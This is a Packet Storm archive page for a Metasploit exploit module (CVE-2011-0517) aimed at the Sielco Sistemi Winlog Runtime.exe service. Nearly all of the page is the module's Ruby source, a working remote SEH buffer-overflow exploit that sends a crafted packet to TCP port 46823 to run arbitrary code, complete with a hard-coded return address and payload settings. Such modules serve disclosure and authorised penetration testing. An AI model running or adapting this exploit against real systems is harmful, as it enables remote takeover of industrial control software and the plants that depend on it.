exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Sielco Sistemi Winlog Buffer Overflow

Sielco Sistemi Winlog Buffer Overflow
Posted Jun 23, 2011
Authored by Luigi Auriemma, MC | Site metasploit.com

This Metasploit module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.00. When sending a specially formatted packet to the Runtime.exe service, an attacker may be able to execute arbitrary code.

tags | exploit, overflow, arbitrary
advisories | CVE-2011-0517, OSVDB-70418
SHA-256 | ad560ed7c2b5c2b085b3af27e95252ee83dd229a20d5349ee20068a8929d360f

Sielco Sistemi Winlog Buffer Overflow

Change Mirror Download
##
# $Id: winlog_runtime.rb 13000 2011-06-21 22:42:53Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Sielco Sistemi Winlog Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Sielco
Sistem Winlog <= 2.07.00. When sending a specially formatted
packet to the Runtime.exe service, an attacker may be able to
execute arbitrary code.
},
'Author' => [ 'Luigi Auriemma', 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 13000 $',
'References' =>
[
[ 'CVE', '2011-0517' ],
[ 'OSVDB', '70418'],
[ 'URL', 'http://aluigi.org/adv/winlog_1-adv.txt' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Winlog Lite 2.07.00', { 'Ret' => 0x011946de } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 13 2011'))

register_options([Opt::RPORT(46823)], self.class)
end

def exploit

connect

data = [0x02].pack('C') # opcode
data << [0x0101].pack('n')
data << rand_text_alpha_upper(588)
data << generate_seh_payload(target.ret)

print_status("Trying target #{target.name}...")
sock.put(data)

handler
disconnect

end

end
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close